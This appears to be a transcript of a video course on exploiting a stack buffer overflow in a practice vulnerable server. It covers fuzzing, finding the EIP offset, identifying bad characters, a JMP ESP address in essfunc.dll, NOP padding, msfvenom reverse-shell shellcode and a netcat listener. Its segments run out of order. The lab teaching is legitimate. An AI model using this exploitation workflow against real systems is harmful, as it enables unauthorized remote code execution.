up, we are ready to test the box. So what we'll do is we'll go ahead and fuzz it just to make sure everything is set up properly. So we'll gedit and we'll call it fuzz.py, just like this. We're going to grab this fuzzing script and paste it in. Paste. And then just to make sure that everything is working properly before we move on, we can send this on its way. We'll grab this and we will go Python, and we named it fuzz.py. We'll send this and it should start receiving the fuzzer here, and you'll get to see what it looks like when we crash, and we'll talk about what we do with this crash in the next video. I'll go ahead and pause this, and once it crashes I'll bring you back. Okay, so it has crashed. It says that it was fuzzing with 2,000 bytes. The crash happened at 2,000 bytes. What we do know is it's around 2,000 bytes, but we need to know exactly where this crashed. And so if you look at this script right here, what we're doing is we're just sending 100 A's every single time the script runs, while this while loop runs. And so you can see the A's here, and when the EIP was overwritten, it was 414141. This is just A. So we know that we were able to overwrite the EIP, but we need to find exactly where it was overwritten at for us to point it to our malicious code. And we'll continue in the next video. We are going to overwrite the EIP to make sure that we have the exact offset ready and to go. So we'll go ahead and come back over here. We're going to edit our fuzzer again. What we will do this time is go back to this, to the start, pull this back over. I'm going to just comment this out so that you have it in the future as a reference. You can comment yours out as well. And now we're going to delete this offset right here. And so there's two different ways to do this. Because we left this 100 in, and it said our offset was 1,878. You can leave this and you can just go plus 1,878 A's, or you can just add this 100 into what we already did, which is what I'm going to do. So the offset was like this, but because we had that additional 100 A's in there, it is really at this point in the program. So what we're going to do is save this. We're going to put in a string of B's, and because the IEP is 4 long, we're going to put 4 B's in. We will save this, and now we're going to restart the program. We're going to run it. We'll come back to the terminal, and we will shoot our script at it again. And you can see right here We have the EIP is 42424242, and that is our Bs. So now we know we control the EIP, and we will go ahead and move on to the next step in the next video. We are going to be looking for bad characters. So what we'll do, just starting out, is we will gedit our script we've been working with. We will add in bad characters. It will look like this. We're going to make this variable, and then we're going to have these parentheses. I'm not sure if these spaces here matter. And these are all different characters that we can use to generate our shell code so that we can get a shell on this box. And the place to get these is Google. So what you'll do is you'll just go out to Google, you'll type in bad characters, and you will click on one of the pages that comes up, and you can just copy what they have and then paste it into your script. And the way these bad characters work, if you have one that says bad like this X38 right here, if you have this as a bad character, maybe it's because something inside the program uses this character to point to another script or to something else to run, and so it would crash in your script. Your shellcode that you generate won't work, and so we need to identify all of the bad characters, and you'll notice one that's already missing. It's possible that the script you find would have it would say /x00, and you can just delete the null byte, because the null byte is always going to be a bad character. So if the script you find on Google already has, if it has the X00, the null byte, you can go ahead and delete that, and we're going to start right here at 1. So what we'll do is come over here, we're going to add in our bad characters. So we'll type in this variable here, and that will run in our script. So we'll save that, restart the debugger. We will run it, make sure that it's running down in the corner. We'll run our updated Python script. It will crash. Now what we're going to do is come to this ESP, and we are going to follow in dump. And here are the bad characters. This is where we're going to find these. So we'll try and adjust the text size. I think it's over here. Font. There, that's as big as it will go. So what we'll do when we come in here is try to identify the bad characters. And what it does is it'll just start with 1, 2, 3, 4 and go on. And when you hit a bad character, it will be out of place. Like this right here looks out of place to me. What I would do is come over here, open up my bad characters. So we're going to have 1, 2, 3, 4, 5. And then once we hit 9, it's going to start over at 0A. So we have that sitting there. So we have 1, 2, 3, 4. See, remember we start after our list of B's, and it says 6, and then we hit A, D, 9. So if it were me, I would go ahead and take this 7 and this 8, and I would remove these from the code. So you can copy it, you can delete it. What I like to do, this is one of the few times I will have a pen and paper in my hands, and I will write them down. So in the end, I can delete these or save these bad characters. You don't want to delete them because we're going to need them later to generate our script. So we would save, it would be these ones. We would save these as bad characters, and it's okay to have, like, let's say we accidentally put this 6, 7, 8 as our bad characters, and the 6 really is not a bad character. That's okay. It will still generate the shell code for us. We just want to make sure that all the bad characters are removed, and if a bad character is not removed, your shell code will not work, and then you're going to have to come back here and go through this entire process again. And one of the things that we see when we're doing this here is the bad characters. So we have this 7, and then we have this looks like the 8, and then we see down here again we see the same thing. It's always going to be, well, not always, but most of the time the bad characters are going to look the exact same. And so I'll let you guys go ahead and pause this if you want, or if you're following along on the box, you can find all the bad characters, and once you do, I will bring you back and I'll have the bad characters mapped out, and we will move on to the next step in this process. Has come for your work to pay off, and we are about to get a shell on this box. So what we'll do is we'll come over here and we will open, we will restart the program. We can just go ahead and start it, and we don't need to mess with anything else at this time. I've already typed out our MSF Venom to give us our shellcode. You can go to where we normally get our payloads on Google, or you can just copy this and type it and save it out. So what we have here is the payload that we're going to be using, our local host, the port we want to use, the bad characters. I'm pretty sure I have some extras, but that's okay. And then we have the -F-C, and then the architecture, which is the x86. We can generate our shellcode here. And once that's done, we will go back and modify our fuzzing script. So what we can do is we can go gedit, and we can come here and modify the script we've been using. We'll need to go and we'll need to add in something else. We're going to need to do a plus, and then we're going to need to put in some nops. They don't do anything. They're just kind of like a padding space before we go to our shellcode to make sure it gets to where it needs to be. And we'll do 32 of those. And the amount of nops you use is going to change depending on the machine you're doing. I've seen some people use as low as 8 all the way up to 32. I know 32 works on this machine, so that's what we're going to go ahead and use. So we'll also add in our buff, or actually we'll just call it our shell, because this is going to be our shell code. So we're going to need to make a new variable called shell, and it is going to be the shell code we just copied over. I like that to be on a new line so that way it looks nice and pretty. Looking at this, I believe this needs to be inside quotes so that way it gets entered as a string. And that should work. And so now that this is running, everything is going, it says it's running down here, we should be able to shoot our payload. But before we do, we need to make sure that we have our netcat listener going on the port that we specified in the payload. So we'll go Python, and then we use fuzzer.py, and that should generate for us our, oops, who am I? And it says we are on the box. So this is how you work through the buffer overflows. This workflow will work for all of the machines you're probably going to encounter. And now you will be able to come back and reference these videos as you work through more buffer overflows. If you have any questions, please let me know, and maybe I can make additional videos and clarify anything that wasn't clear throughout the buffer overflow portion of this course. Our bad characters, and I actually, now that I'm looking at them, see I forgot to add in the null byte, so we'll go ahead and do that now. We'll go gedit, and then we'll type in bad, and we will add in the x00. So now we should have all the bad characters, at least I hope we do, otherwise our shellcode at the end will not work for us. But now what we need to do is find the module that we can use as our jump point. So we'll go ahead and type in down here, !Mona modules, and that will bring us to this page. And what we're looking for underneath this module info is one of these that has false, false, false all the way across, that also is connected to our vulnerable server, and that is this essfunc.dll. So that's the one we're going to look for, and we're going to need to find the opcode equivalent for the jump point for this. So the way we'll do that is we can come over here, we can open this up, we can type in locate NASM, and the one we're going to use is this right here. And when we'll copy paste, we'll run this, and it will bring us to a NASM console, and then we will type in JMPESP, and that will give us this FFE4. And so we'll come back over here, and we're going to find this for that. We're going to find the FFE4, the jump point for the ESS func.dll. So we'll type in find -s, and then we're going to go /xff/xe4, close off our quotes, -m ESS func.dll. And that will bring us up these results right here. And you can just start at the top and work your way down if you were in a live situation, but this first one will work for us. So we're going to need to remember 625011AF. You can type that out and save it so that we have that there. And now what we're going to do is come back over here, open up our server we're attacking. We're going to come over here. We're going to hit this little arrow to set our jump point. I have already typed this in for us, so that way we don't have to watch me do that. We will hit OK. It's going to take us to that point, that FFE4 right here with that number. On a Mac, to highlight this to make it our jump point, it is function F2, and that should highlight it for us. Now what we'll do is come back over here. We will gedit our fuzzer once again. If your bad characters are still in here, you can delete those and put it back, set your BBB back in here. But what we'll do is take this same number we have right here, and we'll have to put it in backwards right here. So we'll delete that, and we will type quote. Oh, we already have our two quotes. We'll go -XAF -X11 or /X50 and then X62, and then that will close out our quote. And so if you notice, what we did here is we actually entered this in backwards because this is an x86 Windows machine, and it will read this in what's called Little Endian format, and you will hear that in the future. And now you know Little Endian just means that it's going to read this backwards. So we should be able to save this now, as long as it's entered correctly, and shoot it at our vulnerable server, which we need to now start. So we'll get that started. And this should give us the EIP right here. So this now has set up our jump point, and it will come to this file, and now it's going to shoot us over to our reverse shell and our payload, which we're going to make in the next video, and will give us the reverse shell that we're looking for.